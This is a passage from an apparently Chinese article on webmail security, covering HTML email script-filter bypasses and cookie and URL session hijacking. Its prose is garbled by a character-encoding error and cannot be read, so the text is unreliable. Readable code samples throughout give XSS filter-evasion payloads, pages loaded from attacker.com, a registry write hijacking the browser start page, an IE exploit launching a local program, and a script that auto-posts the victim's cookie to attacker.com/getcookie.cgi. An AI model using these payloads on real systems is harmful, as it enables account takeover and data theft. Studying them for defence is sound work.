<|>ÉèÖÃIEä¯ÀÀÆ÷ĬÈÏÒ³ 
RegWsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", 
"http://www.attacker.com" 
</script>

¼øÓڽű¾³ÌÐò¿ÉÄÜ´øÀ´µÄΣÏÕ£¬webmailϵͳÍêÈ«ÓбØÒª½ûÖ¹htmlÓʼþÖеĽű¾³ÌÐò¡£½ûÖ¹½Å±¾³ÌÐòµÄ»ù±¾×ö·¨¾ÍÊǹýÂ˵ôhtmlÔ´³ÌÐòÖÐÄܹ»Ê¹½Å±¾³ÌÐòÔËÐеĴúÂ룬ÈçscriptÔªËØµÈ£¬ÔÚÕâ·½Ãæ×öµÄ×îºÃµÄιýÓÚhotmailÁË¡£ÏÂÃæÊÇЩ³£¼ûµÄÈÆ¹ý½Å±¾³ÌÐò¹ýÂ˵ķ½·¨£¬²»ÉÙµÄwebmailϵͳÈÔȻûÓÐÍêÈ«¸ÄÕý£º

1¡¢ ÔÚhtmlÓïÑÔÀ³ýÁËscriptÔªËØÄڵĻòÔÚscriptÔªËØÄÚÒýÈëµÄ½Å±¾³ÌÐòÄÜÔÚhtmlÒ³Ãæ×°ÔØÊ±±»ÔËÐÐÍ⣬ʹÓÃʼþÊôÐÔÒ²Äܵ÷Óýű¾³ÌÐòÔËÐУ¬Ê¼þÊôÐÔÔÚJavaScriptÓïÑÔÀï±»³ÆÎªÊ¼þ¾ä±ú£¬ÓÃÓÚ¶ÔÒ³ÃæÉϵÄij¸öÌØ¶¨Ê¼þ£¨ÈçÊó±êµã»÷¡¢±íµ¥Ìá½»£©×ö³öÏìÓ¦£¬Çý¶¯javascript³ÌÐòÔËÐС£ËüµÄÓï·¨ÈçÏ£º

<tag attribute1 attribute2 onEventName="javascript code;">

ÀýÈ磺

<body onload="alert(<|>JavaScript#1 is executed<|>);">
<a href="#" onclick="alert(<|>JavaScript#2 is executed<|>);">Click here</a>
<form method="post" action="#" onsubmit="alert(<|>JavaScript#3 is executed<|>);">
<input type="submit" value="Submit">
</form>
</body>

2¡¢ URI£¨Universal Resource Identifier£ºÍ¨ÓÃ×ÊÔ´±êʶ£©ÓÃÓÚ¶¨Î»InternetÉÏÿÖÖ¿ÉÓõÄ×ÊÔ´£¬ÈçHTMLÎĵµ¡¢Í¼Ïñ¡¢ÉùÒôµÈ¡£ä¯ÀÀÆ÷¸ù¾ÝURIµÄ×ÊÔ´ÀàÐÍ£¨URI scheme£©µ÷ÓÃÏàÓ¦µÄ³ÌÐò²Ù×÷¸Ã×ÊÔ´£¬Èç¹û°ÑÒ»Ð©ÔªËØµÄURIÊôÐÔÖµµÄ×ÊÔ´ÀàÐÍÉèΪjavascript£¬ÔòÄܹ»µ÷ÓÃjavascript³ÌÐòÔËÐС£Óï·¨ÈçÏ£¬×¢ÒâÒªÓá°;¡±·Ö¸ô²»Í¬µÄjavascriptÓï¾ä£º

<tag attribute="javascript:javascript-code;">

ÀýÈ磺

<body background="javascript:alert(<|>JavaScript#1 is executed<|>);">
<a href="javascript:alert(<|>JavaScript#2 is executed<|>);">Click here</a>
<form method="post" action="javascript:alert(<|>JavaScript#3 is executed<|>);">
<input type="submit" value="Submit">
</form>
<img src="javascript:alert(<|>JavaScript#4 is executed<|>);">
</body>

3¡¢ ÓÉÓÚÈíÓ²¼þ»òÆäËûÔ­Òò£¬Ò»Ð©À䯧»òÌØÊâµÄ×Ö·û²»ÄÜÊäÈë»òÕýÈ·ÏÔʾÔÚhtmlÒ³ÃæÉÏ£¬ÎªÁ˽â¾öÕâ¸öÎÊÌ⣬htmlÖпÉÒÔʹÓÃSGML×Ö·û²Î¿¼¡£×Ö·û²Î¿¼ÊÇÒ»ÖÖÓÃÀ´Ö¸¶¨Îĵµ×Ö·û¼¯ÖÐÈκÎ×Ö·ûµÄ¶ÀÁ¢±àÂë»úÖÆ£¬ÒÔ¡°&¡±¿ªÊ¼£¬ÒÔ¡°;¡±½áÊø¡£×Ö·û²Î¿¼ÓÐÁ½ÖÖ±í´ï·½Ê½£ºÊý×Ö×Ö·û²Î¿¼ºÍʵÌå×Ö·û²Î¿¼¡£Êý×Ö×Ö·û²Î¿¼µÄÓ﷨Ϊ¡°&#D;¡±£¨D´ú±íÒ»¸öÊ®½øÖÆÊý£©£¬»ò¡°&#xH;¡±¡¢¡°&#XH;¡±£¨H´ú±íÒ»¸öÊ®Áù½øÖÆÊý£©£¬ÀýÈç¡°A¡±¡¢¡°A¡±±íʾ×Öĸ¡°A¡±£¬¡°Ë®¡±¡¢¡°Ë®¡±±íʾºº×Ö¡°Ë®¡±¡£

¹¥»÷Õß°ÑhtmlÓï¾äÀïµÄһЩ×Ö·ûÒÔÊý×Ö×Ö·û²Î¿¼À´´úÌæ£¬ÕâÑùÄܱܿªwebmailϵͳ¶Ô½Å±¾³ÌÐòµÄ¹ýÂË¡£ÐèҪעÒâµÄÊÇ£¬ÔªËغÍÊôÐÔ²»¿ÉÒÔÓÃ×Ö·û²Î¿¼±íʾ£¬ÀýÈ磺

<body>
<img lowsrc="javasCript:alert(<|>JavaScript#1 is executed<|>)">
<a href="javAsCript:alert(<|>JavaScript#2
i&#x73 executed<|>)">Click here</a>
<form method="post" action="javascript:alert(<|>JavaScript#3 is 
executed<|>)">
<input type="Submit" value="Submit">
</form>
</body>

4¡¢ Ñùʽ±íÊDzãµþÑùʽ±íµ¥£¨CSS£ºCascading Style Sheet£©µÄ¼ò³Æ£¬ÓÃÓÚ¿ØÖÆ¡¢ÔöÇ¿»òÍ³Ò»ÍøÒ³ÉϵÄÑùʽ£¨Èç×ÖÌå¡¢ÑÕÉ«µÈ£©£¬ËüÄܹ»½«ÑùʽÐÅÏ¢ÓëÍøÒ³ÄÚÈÝÏà·ÖÀ룬ÔÚhtmlÓïÑÔµÄstyle±êÇ©ÄÚ¿ÉÒÔÓÃ@importÉùÃ÷ÊäÈëÒ»¸öÑùʽ±í¡£µ«ÊÇ£¬Èç¹ûÊäÈëµÄ×ÊÔ´ÀàÐÍ»òÄÚÈÝÊÇjavascript£¬Internet Explorerä¯ÀÀÆ÷ÈÔÈ»»áÖ´ÐС£ÀýÈ磺

<style type="text/css">
<!--
@import url(javascript:alert(<|>JavaScript#1 is executed<|>));
@import url(http://www.attacker.com/js.css);
-->
</style>

ÆäÖÐhttp://www.attacker.com/js.cssµÄÄÚÈÝÈçÏÂËùʾ£º

@import url(javascript:alert(<|>JavaScript#2 is executed<|>));
@import url(javascript:eval(String.fromCharCode
(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,
108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));

Äܹ»Èƹýwebmailϵͳ¶Ô½Å±¾³ÌÐò¹ýÂ˵ķ½·¨Ô¶²»Ö¹ÉÏÃæËù˵µÄÕâЩ£¬ÀýÈçÔøÓÐÈË·¢ÏÖ°Ñ¡°<script>¡±±êÇ©¸Ä³É¡°<_a<script>¡±ºÍ¡°<<script>¡±µÄÑù×ÓÄÜÈÆ¹ýyahooµçÓʵĹýÂË£¬Õâ¸ö©¶´yahooÔÚ×î½ü²Å¸ÄÕý¹ýÀ´¡£

³ýÁË¿ÉÒÔÔÚhtmlÓʼþÖÐÖ±½ÓǶÈë½Å±¾³ÌÐòÍ⣬¹¥»÷Õß»¹¿ÉÒÔÉè¼ÆÒ»Ð©html´úÂ룬ÔÚÓû§´ò¿ªhtmlÓʼþʱ£¬²»Öª²»¾õÒýÈëÁíÒ»¸öhtmlÎļþ£¬¶ø´ËÎļþÖÐÕýº¬ÓжñÐÔ´úÂ룬ÕâÑù²»½öÄÜÖ±½ÓÈÆ¹ýwebmailϵͳ¶Ô½Å±¾³ÌÐòµÄ¹ýÂË£¬¶øÇÒ»¹ÄÜÓÐЧ±Ü¿ªÌṩÁË·À¶¾·þÎñµÄÓʼþϵͳ¶Ô¶ñÐÔ´úÂëµÄ²éɱ¡£ÏÂÃæÊǼ¸¸öµ÷ÓÃhtmlÎļþµÄÀý×Ó£º

1¡¢Refreshµ½ÁíÒ»¸öÒ³Ãæ£º

<body>
<meta http-equiv="refresh" content="1;URL=http://www.attacker.com/another.htm">
</body>

2¡¢IframeÒýÈëÁíÒ»¸öÒ³Ãæ£º

<body>
<iframe src="http://www.attacker.com/import.htm" frameborder="0"></iframe>
</body>

3¡¢scriptletÒýÈëÁíÒ»¸öÒ³Ãæ£º

<body>
<object type="text/x-scriptlet" data="http://www.attacker.com/import.htm"></object>
</body>

¹¥»÷Õß»¹¿ÉÒÔ²ÉÈ¡ÈçÏ·½·¨£¬Ê¹´øÓжñÐÔ´úÂëµÄhtmlÓʼþ¾ßÓиü´óµÄÒþ±ÎÐÔ£º

1¡¢ ÅäºÏÓʼþÆÛÆ­¼¼Êõ£¬Ê¹Óû§²»»á»³ÒÉÊÕµ½µÄÓʼþ£¬²¢ÇÒ¹¥»÷ÕßÒ²ÄÜÒþ²Ø×Ô¼ºµÄÐÐ×Ù¡£

2¡¢ °ÑhtmlÓʼþÉè¼Æ³É¿´ÆðÀ´ÏñtxtÓʼþ¡£

3¡¢ ÓÐʱ¿ÉÒÔ°ÑhtmlÓʼþÖеĶñÐÔ´úÂë·ÅÔÚÒ»¸öÒþ²ØµÄ²ãÀïÃæ£¬±íÃæÉÏ¿´²»³öÈκα仯¡£

Õë¶Ô¶ñÐԽű¾³ÌÐòµÄÓ°Ï죬¶ÔÓû§³£¼ûµÄ½¨Òé°ì·¨ÊÇÌá¸ßä¯ÀÀÆ÷µÄ°²È«¼¶±ð£¬Èç½ûÓÃActiveX¡¢½ûÓýű¾µÈ£¬µ«Õâ²¢²»ÊÇÒ»¸öºÜºÃµÄ°ì·¨£¬ÒòΪÕâÑù»áÓ°Ïìµ½Óû§¶ÔÆäËûÕý³£htmlÒ³ÃæµÄä¯ÀÀ¡£¼´Ê¹ä¯ÀÀÆ÷´ïµ½ÁË×î¸ß¼¶±ð£¬ÒÀÈ»¶ÔijЩ¶ñÐÔ´úÂëÎÞ¼ÃÓÚÊ£¬ÏÂÃæÊÇλÒÔÉ«Áа²È«×¨¼Ò·¢Ïֵĩ¶´£¬ÄÜÈÃWindowsϵͳ×Ô¶¯Ö´ÐÐÈκα¾µØ³ÌÐò£¬¼´Ê¹Internet ExplorerÒѾ­½ûÖ¹ÁËActiveXºÍ½Å±¾³ÌÐò£º

<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span>

<xml id="oExec">
<security>
<exploit>
<![CDATA[
<object id="oFile" classid="clsid:11111111-1111-1111-1111-
111111111111" codebase="c:/winnt/system32/calc.exe"></object>
]]>
</exploit>
</security>
</xml>

Ãæ¶Ô¶ñÐÔhtmlÓʼþ£¬webmailϵͳºÍÓû§Ëƺõ¶¼Ã»ÓкܺõĽâ¾ö°ì·¨£¬ËäÈ»Ðí¶àwebmailϵͳÒѾ­Äܹ»¹ýÂ˵ôhtmlÓʼþÖеĺܶà¶ñÐÔ´úÂ룬²»¹ýÁîÈËÒź¶µÄÊÇ£¬ÒªÏë³¹µ×¹ýÂ˵ô¶ñÐÔ´úÂë²¢²»ÊÇÒ»¼þÈÝÒ×µÄÊÂÇ飬¹¥»÷Õß×ÜÄÜÀûÓÃwebmailϵͳ¹ýÂË»úÖÆºÍä¯ÀÀÆ÷µÄ©¶´ÕÒµ½°ì·¨ÈƹýÖÖÖÖ¹ýÂË£¬webmailϵͳËùÄÜ×öµÄ¾ÍÊÇ·¢ÏÖÒ»¸ö©¶´²¹Ò»¸ö©¶´¡£

ΪÁ˼õÉÙÄËÖÁ±ÜÃâ¶ñÐÔhtmlÓʼþµÄÓ°Ï죬ÔÚ´ò¿ªhtmlÓʼþ֮ǰ£¬webmailϵͳÓбØÒªÌáÐÑÓû§ÕâÊÇÒ»¸öhtmlÓʼþ£¬Èç¹ûÄÜÌṩÈÃÓû§ÒÔÎı¾·½Ê½ä¯ÀÀhtmlÓʼþµÄ¹¦ÄÜ£¬ÔòÊÇ×îºÃ²»¹ý¡£ÔÚ´ò¿ª²»Ã÷Óʼþ֮ǰ£¬Óû§¸üҪСÐĽ÷É÷£¬×îºÃ°ÑhtmlÓʼþ¡°Ä¿±êÁí´æÎª¡±µ½±¾µØÓ²ÅÌÉÏÔÙ´ò¿ªÀ´¿´£¬Èç¹ûÄÜÏȲ鿴htmlÓʼþÔ´´úÂ룬ÔòÊÇ×îºÃ²»¹ý¡£

ÁíÍâÐèÒªÌØ±ðÌáÐÑÓû§×¢ÒâµÄÊÇ£¬ËäȻһЩµç×ÓÓʼþϵͳ»áÔÚwebmailϵͳÉ϶ÔhtmlÓʼþÖеĶñÐÔ´úÂë½øÐйýÂË£¬µ«ÔÚpop3·þÎñÆ÷Éϲ¢²»»á½øÐйýÂË£¬ËùÒÔ£¬Èç¹ûÊÇͨ¹ýÓʼþ¿Í»§¶ËÊÕÈ¡Óʼþ£¬ÈÔȻҪ½÷·À¶ñÐÔhtmlÓʼþµÄΣº¦¡£

Îå¡¢Cookie»á»°¹¥»÷
µ±Óû§ÒÔ×ÔÒѵÄÓÊÏäÕÊ»§ºÍÃÜÂëµÇ¼½øwebmailÒÔºó£¬Èç¹ûÔÙÈÃÓû§¶Ôÿһ²½²Ù×÷¶¼ÊäÈëÃÜÂë¼ÓÒÔÈ·ÈϾͻáÈÃÈ˲»ÉõÆä·³¡£ËùÒÔwebmailϵͳÓбØÒª½øÐÐÓû§»á»°¸ú×Ù£¬webmailϵͳÓõ½µÄ»á»°¸ú×Ù¼¼ÊõÖ÷ÒªÓÐÁ½ÖÖ£ºcookie»á»°¸ú×ÙºÍURL»á»°¸ú×Ù¡£

CookieÊÇweb·þÎñÆ÷±£´æÔÚÓû§ä¯ÀÀÆ÷ÉϵÄÎı¾ÐÅÏ¢£¬¿ÉÒÔ°üº¬Óû§Ãû¡¢ÌØÊâID¡¢·ÃÎÊ´ÎÊýµÈÈκÎÐÅÏ¢£¬Í¨³£´ËÐÅÏ¢ÓÃÓÚ±êʶ·ÃÎÊͬһweb·þÎñÆ÷ÉϵIJ»Í¬Óû§£¬ÔÚä¯ÀÀÆ÷ÿ´Î·ÃÎÊͬһweb·þÎñÆ÷ʱ»á·¢Ë͹ýÈ¥£¬ÓÃÓÚ¸ú×ÙÌØ¶¨¿Í»§¶Ë»òä¯ÀÀÆ÷Óëweb·þÎñÆ÷½øÐн»»¥µÄ״̬¡£

CookieµÄÀàÐÍÓÐÁ½ÖÖ£º³Ö¾ÃÐͺÍÁÙʱÐÍ¡£³Ö¾ÃÐÍcookieÒÔÎı¾ÐÎʽ´æ´¢ÔÚÓ²ÅÌÉÏ£¬ÓÉä¯ÀÀÆ÷´æÈ¡¡£Ê¹ÓÃÁ˳־ÃÐÍcookie»á»°¸ú×ÙµÄwebmailϵͳÓÐhotmail¡¢yahooµçÓÊ£¨¿ÉÑ¡£©µÈ¡£ÁÙʱÐÍcookieÒ²³ÆÎª»á»°cookie£¬´æ´¢ÔÚÄÚ´æÖУ¬½öΪµ±Ç°ä¯ÀÀÆ÷µÄ¶Ô»°´æ´¢£¬¹Ø±Õµ±Ç°ä¯ÀÀÆ÷ºó»áÁ¢¼´Ïûʧ£¬ASP¡¢PHP4µÈ¿ª·¢³ÌÐòÖÐÓõ½µÄsession¶ÔÏó¾Í»á²úÉúÁÙʱÐÍcookie¡£Ê¹ÓÃÁËÁÙʱÐÍcookie»á»°¸ú×ÙµÄwebmailϵͳÓÐFM365¡¢ÒÚÓʵȡ£

Èç¹û¹¥»÷ÕßÄܹ»»ñÈ¡Óû§webmailµÄcookieÐÅÏ¢£¬ÄÇô¾ÍÄܺÜÈÝÒ×µØÇÖÈëÓû§µÄwebmail¡£¹¥»÷ÕßÈçºÎ»ñÈ¡Óû§webmailµÄcookieÐÅÏ¢ÄØ£¿Èç¹û¹¥»÷ÕßÔÚÓû§µÄµçÄÔÉϰ²×°ÁËľÂí£¬»òÕßÄܹ»´ÓÍøÂçÏß·É϶ÔÓû§½øÐÐÐá̽ÕìÌý£¬ÄÇô»ñÈ¡cookieÐÅÏ¢×ÔÈ»²»³ÉÎÊÌ⣬²»¹ýÕâ²¢²»ÊÇÎÒÃÇÌÖÂÛÎÊÌâµÄÒâÒåËùÔÚ£¬ÒòΪ¶¼Äܹ»ÕâÑùÁË£¬Óֺαشó·ÑÖÜÕÛÈ¥»ñÈ¡cookieÐÅÏ¢£¬Ö±½Ó»ñÈ¡ÓÊÏäÃÜÂë¾ÍÊÇÁË¡£

Èç¹ûwebmailϵͳ´æÔÚ¿çÕ¾½Å±¾Ö´ÐЩ¶´£¬ÄÇô¹¥»÷Õß¾ÍÄÜÆÛÆ­Óû§´Ó¶øÇáÒ׵ػñÈ¡cookieÐÅÏ¢£¬ËäÈ»ÖÚ¶àÍøÕ¾´æÔÚ´Ë©¶´£¬µ«´æÔÚ´Ë©¶´µÄwebmailϵͳ»¹ºÜÉÙ¼û¡£

º¬ÓжñÐԽű¾³ÌÐòµÄhtmlÓʼþÄÜʹ¹¥»÷Õß»ñÈ¡webmailµÄcookieÐÅÏ¢¡£HtmlÓʼþÖеĽű¾³ÌÐòÏÈÌáÈ¡µ±Ç°webmailµÄcookieÐÅÏ¢£¬È»ºó°ÑËü¸³Öµ¸øÄ³¸ö±íµ¥ÔªËØ£¬ÔÙ½«±íµ¥×Ô¶¯Ìá½»¸ø¹¥»÷Õߣ¬¹¥»÷Õß´Ó¶ø»ñµÃcookie»á»°ÐÅÏ¢¡£ÏÂÃæÊÇÒ»¶ÎÑÝʾ³ÌÐò£º

<body>
<form method="post" action="http://attacker.com/getcookie.cgi" name="myform">
<input name="session" type="hidden">
</form>

<script language="JavaScript">
var cookie=(document.cookie);
alert(cookie);//ÕâÒ»¾äÓÃÓÚÏÔʾµ±Ç°cookieÐÅÏ¢£¬µ±È»£¬¹¥»÷Õß²»»áÕâÑù×ö¡£
document.myform.session.value=cookie;
document.myform.submit();
</script>

getcookie.cgiÊÇ·ÅÔÚ¹¥»÷Õßweb·þÎñÆ÷ÉϵÄÒ»¸öcgi³ÌÐò£¬ÓÃÓÚ»ñÈ¡±íµ¥Ìá½»¹ýÀ´µÄcookieÐÅÏ¢£¬²¢ÇÒ×ö¼Ç¼»òÕß֪ͨ¹¥»÷Õß¡£µ±È»£¬¹¥»÷Õß»á°ÑhtmlÓʼþ¡¢getcookie.cgi³ÌÐòÉè¼ÆµÃ¸üÒþ±Î£¬¸ü¾ßÆÛÆ­ÐÔ£¬ÈÃÓû§ÄÑÒÔ²ì¾õ¡£

ͨ³££¬ä¯ÀÀÆ÷¸ù¾Ýweb·þÎñÆ÷µÄÓòÃûÀ´·Ö±ð±£´æcookieÐÅÏ¢£¬²¢ÇÒÖ»»á°ÑcookieÐÅÏ¢·¢Ë͸øÍ¬Ò»ÓòÃûµÄweb·þÎñÆ÷¡£²»¹ý£¬ä¯ÀÀÆ÷µÄ©¶´¸ø¹¥»÷Õß»ñÈ¡²»Í¬ÓòÃûµÄcookieÐÅÏ¢´´ÔìÁË»ú»á£¬Internet Explorer¡¢NetscapeºÍMozillaµÈ±»¹ã·ºÊ¹ÓõÄä¯ÀÀÆ÷¶¼´æÔÚ¹ý´ËÀà©¶´¡£ÏÂÃæÊǼ¸¸öInternet Explorerä¯ÀÀÆ÷£¨Õë¶ÔIE5.0¡¢IE5.5»ò6.0£©Ð¹Â©cookieÐÅÏ¢µÄÀý×Ó£º

1¡¢ HtmlÓïÑÔÖеÄobjectÔªËØÓÃÓÚÔÚµ±Ç°Ò³ÃæÄÚǶÈëÍⲿ¶ÔÏ󣬵«Internet Explorerä¯ÀÀÆ÷¶ÔobjectÔªËØÊôÐԵĴ¦Àí²»µ±»áµ¼ÖÂÈÎÒâÓòµÄcookieÐÅÏ¢±»Ð¹Â©£¬ÑÝʾ´úÂëÈçÏ£º

<object id="data" data="empty.html" type="text/html"></object>
<script>
var ref=document.getElementById("data").object;
ref.location.href="http://www.anydomain.com";
setTimeout("alert(ref.cookie)",5000);
</script>

2¡¢ Internet Explorerä¯ÀÀÆ÷´íÎó´¦Àí¡°about¡±Ð­ÒéʹµÃÒ»¸ö¾«ÐĹ¹ÔìµÄURLÇëÇó¿ÉÄÜ»áÏÔʾ»òÐÞ¸ÄÈÎÒâÓòµÄcookieÐÅÏ¢£¬ÀýÈ磨ÒÔÏ´úÂëÔÚͬһÐУ©£º

about://www.anydomain.com/<script language=JavaScript>alert(document.cookie);</script>

3¡¢ Internet Explorerä¯ÀÀÆ÷»áÎó°ÑURLÖС°%20¡±£¨¿Õ¸ñ·ûµÄURL±àÂ룩×Ö·û´®Ö®Ç°µÄÖ÷»úÃûµ±×öcookieÐÅÏ¢ËùÔÚµÄÓò£¬²¢ÇÒ·¢ËͳöÈ¥¡£¼ÙÉè¹¥»÷ÕßÓÐÒ»¸öÓòÃû¡°attacker.com¡±£¬¹¥»÷Õß°ÑËü×ö³É·ºÓòÃû½âÎö£¬¼´°Ñ¡°*.attacker.com¡±Ö¸Ïò¹¥»÷Õßweb·þÎñÆ÷ËùÔÚµÄIPµØÖ·£¬¡°attacker.com¡±ÏµÄÈκÎ×ÓÓòÃû»òÖ÷»úÃû¶¼»á±»½âÎö³ÉÕâ¸öIPµØÖ·£¬µ±Óû§Ìá½»ÁËÀàËÆÏÂÃæÕâÑùµÄURLºó£¬ä¯ÀÀÆ÷¾Í»á°Ñ¡°anydomain.com¡±ÓòÃûµÄcookieÐÅÏ¢·¢Ë͸ø¹¥»÷Õߣº

http://anydomain.com%20.attacker.com/getcookie.cgi

Èç¹û¹¥»÷ÕßÒª»ñÈ¡webmailµÄÁÙʱÐÍcookieÐÅÏ¢£¬¾Í»áÔÚhtmlÓʼþÖÐдÈëÏàÓ¦µÄ´úÂ룬ÔÚÓû§ä¯ÀÀÓʼþʱ£¬¸Ã´úÂë×Ô¶¯Ö´ÐУ¬Ê¹µÃ¹¥»÷ÕßÄܹ»»ñÈ¡µ±Ç°ä¯ÀÀÆ÷ÀïµÄÁÙʱcookieÐÅÏ¢£¬Ò²¿ÉÒÔ°ÑÓÃÓÚ»ñÈ¡cookieÐÅÏ¢µÄURL·¢Ë͸øÓû§£¬ÓÕÆ­Óû§´ò¿ª¸ÃURL£¬ÕâÑù¹¥»÷ÕßÒ²ÄÜ»ñÈ¡ÁÙʱcookieÐÅÏ¢¡£

ÔÚ¹¥»÷Õß»ñÈ¡cookieÐÅÏ¢ºó£¬Èç¹ûcookieÐÅÏ¢ÀﺬÓÐÃÜÂëµÈÃô¸ÐÐÅÏ¢£¬ÄÇô¹¥»÷Õß¾ÍÄܺÜÇáÒ×µØÇÖÈëÓû§µÄÓÊÏ䣬ËäÈ»hotmailµÈwebmailÏµÍ³Ôø¾­·¢Éú¹ý´ËÀàµÄÇé¿ö£¬µ«cookieÐÅϢй©Ãô¸ÐÐÅÏ¢µÄwebmailϵͳ»¹ºÜÉÙ¼û¡£

¹¥»÷ÕßÔÚ»ñÈ¡cookieÐÅÏ¢Ö®ºó£¬»¹ÒªÈôËcookieÐÅÏ¢ÓÉä¯ÀÀÆ÷À´´æÈ¡´Ó¶øÓëwebmailϵͳ½¨Á¢»á»°£¬ÕâÑù²ÅÄÜÇÖÈëÓû§µÄwebmail¡£Èç¹ûÊdz־ÃÐÍcookieÐÅÏ¢£¬¹¥»÷ÕßËùÒª×öµÄÊǰÑÕâ¸öÐÅÏ¢¸´ÖƵ½×Ô¼ºµÄcookieÎļþÖÐÈ¥£¬ÓÉä¯ÀÀÆ÷´æÈ¡¸ÃcookieÐÅÏ¢´Ó¶øÓëwebmailϵͳ½¨Á¢»á»°£¬²»¹ýÁÙʱcookieÐÅÏ¢´æ´¢ÔÚÄÚ´æÖУ¬²¢²»ÈÝÒ×ÈÃä¯ÀÀÆ÷´æÈ¡¡£

ΪÁËÈÃä¯ÀÀÆ÷´æÈ¡ÁÙʱcookieÐÅÏ¢£¬¹¥»÷Õß¿ÉÒԱ༭ÄÚ´æÖеÄcookieÐÅÏ¢£¬»òÕßÐ޸Ĺ«¿ªÔ´´úÂëµÄä¯ÀÀÆ÷£¬ÈÃä¯ÀÀÆ÷Äܹ»±à¼­cookieÐÅÏ¢£¬²»¹ýÕâÑù¶¼²»ÊǺܼò±ãµÄ·½·¨£¬¼ò±ãµÄ·½·¨ÊÇʹÓÃAchilles³ÌÐò£¨packetstormsecurity.orgÍøÕ¾ÓÐÏÂÔØ£©¡£AchillesÊÇÒ»¸öhttp´úÀí·þÎñÆ÷£¬Äܹ»ÔØÈ¡ä¯ÀÀÆ÷ºÍweb·þÎñÆ÷¼äµÄhttp»á»°ÐÅÏ¢£¬²¢ÇÒÔÚ´úÀíת·¢Êý¾Ý֮ǰ¿ÉÒԱ༭http»á»°ÒÔ¼°ÁÙʱcookieÐÅÏ¢¡£

WebmailϵͳӦ¸Ã±ÜÃâʹÓó־ÃÐÍcookie»á»°¸ú×Ù£¬Ê¹¹¥»÷ÕßÔÚcookie»á»°¹¥»÷Éϲ»ÄÜÇáÒ׵óѡ£ÎªÁË·ÀÖ¹cookie»á»°¹¥»÷£¬Óû§¿ÉÒÔ²ÉÈ¡ÈçÏ´ëÊ©ÒÔ¼ÓÇ¿°²È«£º

1¡¢ ÉèÖÃä¯ÀÀÆ÷µÄcookie°²È«¼¶±ð£¬×èÖ¹ËùÓÐcookie»òÕßÖ»½ÓÊÜij¼¸¸öÓòµÄcookie¡£

2¡¢ Ê¹ÓÃcookie¹ÜÀí¹¤¾ß£¬Ôöǿϵͳcookie°²È«£¬ÈçCookie Pal¡¢Burnt CookiesµÈ¡£

3¡¢ ¼°Ê±¸øä¯ÀÀÆ÷´ò²¹¶¡£¬·ÀÖ¹cookieÐÅϢй©¡£

Cookie»á»°¸ú×Ù³ýÁËÉÏÃæÌáµ½µÄ°²È«È±ÏÝÍ⣬»¹´æÔÚÈçÏÂȱµã£º

1¡¢ ²¢²»ÊÇÿ¸öä¯ÀÀÆ÷¶¼Ö§³Öcookie£¬ÓÐЩÓû§ÎªÁË·Àֹй¶Òþ˽ÒÔ¼°´Ó°²È«ÐÔÉÏ¿¼ÂÇ£¬¿ÉÄÜ»á½ûÓÃä¯ÀÀÆ÷µÄcookie¡£

2¡¢ ÓÉÓÚ¹¦ÄÜÏÞÖÆ»òÕßÉèÖÃÓÐÎ󣬴úÀí·þÎñÆ÷²»Äܹ»´úÀícookie£¬µ¼ÖÂͨ¹ý´úÀí·þÎñÆ÷ÉÏÍøµÄÓû§²»ÄܵǼ½øÈëÒÔcookie½øÐлỰ¸ú×ÙµÄwebmail¡£

Áù¡¢URL»á»°¹¥»÷
һЩwebmailϵͳµ¨¸ÒÔÚ¿Í»§¶Ë²»Ö§³Öcookieʱ¾Ü¾øÌṩwebmail·þÎñ£¬ÈçÐÂÀË¡¢ËѺüµÈwebmailϵͳ£¬¶øÁíһЩwebmailϵͳÔòÊÓÓû§ÎªÉϵۣ¬Ê¹ÓÃURL»á»°¸ú×Ù¼¼ÊõÀ´Î¬»¤Óë¿Í»§¶Ë½»»¥µÄ״̬£¬Èç163.net¡¢263.net¡¢21cn.comµÈ¡£

URL»á»°¸ú×ÙÊǰÑһЩ±êʶ»á»°µÄ×Ö·û´®¼ÓÔÚURLÀïÃæ£¬¶ÔÓÚ¿Í»§¶ËµÄÿһ¸öhttpÁ¬½ÓÇëÇ󣬷þÎñ¶Ë¶¼»á°ÑURLÀïµÄ»á»°±êʶºÍËüËù±£´æµÄ»á»°Êý¾Ý¹ØÁªÆðÀ´£¬´Ó¶øÄܹ»Çø·Ö²»Í¬µÄ¿Í»§¶Ë£¬ÒÔ¼°½øÐÐÓû§»á»°¸ú×Ù¡£ÏÂÃæÊÇÔÚä¯ÀÀÆ÷µÄµØÖ·À¸Àï¿´µ½µÄһЩwebmailµÄURL£¬¿´ÆðÀ´»áºÜ³¤ÉõÖÁÓÐЩ¹Ö£º

http://bjweb.163.net/cgi/ldapapp?funcid=main&sid=HAPGfUDusCLAQSIm
http://webmail.21cn.com/extend/gb/std/username/
NV0416qxMftyKnOcavGDktOmIEvPsb/SignOn.gen

ÔڹرÕä¯ÀÀÆ÷ºó£¬±£´æÔÚ·þÎñÆ÷ÀïµÄ»á»°¹ØÁªÊý¾Ý²¢²»»áÁ¢¼´Ê§Ð§£¬Ò»¶Îʱ¼äÄÚwebmailµÄURLÈÔÈ»ÓÐЧ£¬ËûÈËÖ»Òª´Óä¯ÀÀÆ÷µÄÀúÊ·¼Ç¼ÀïÕÒµ½¸ÃURL£¬¾Í¿ÉÒÔµã»÷½øÈëÓû§µÄwebmail£¬²¢²»ÐèÒªÈκÎÃÜÂëÑéÖ¤£¬ËùÒÔÓû§ÔÚÍ˳öwebmailʱ£¬²»Ó¦¸ÃÖ±½Ó¹Ø±Õä¯ÀÀÆ÷£¬Ó¦¸Ãµã»÷webmailÉϵġ°Í˳ö¡±À´Í˳ö£¬ÕâÑù²Å»áÇå¿Õ»á»°£¬Ê¹webmailµÄURLʧЧ£¬ÄÇЩÔÚÍø°ÉµÈ¹«¹²³¡ËùÉÏÍøµÄÓû§ÓÈÆäҪעÒâÕâÒ»µã¡£

Èç¹û¹¥»÷ÕßÖªµÀwebmailϵͳµÄURL»á»°»úÖÆ£¬Äܲµ½webmailµÄ»á»°±êʶ£¬ÄÇô¾ÍÄÜÕÒµ½webmailµÄURL£¬ÔÚä¯ÀÀÆ÷µØÖ·À¸ÀïÊäÈëÏàͬµÄURL¾ÍÄÜÇáÒ׵ؽøÈëÓû§µÄwebmail£¬ËùÒÔwebmailϵͳӦ¸ÃʹÓýϳ¤µÄ¡¢Ëæ»úµÄ×Ö·û´®×öΪ»á»°±êʶ£¬Ê¹¹¥»÷ÕßÄÑÒԲ²⡣

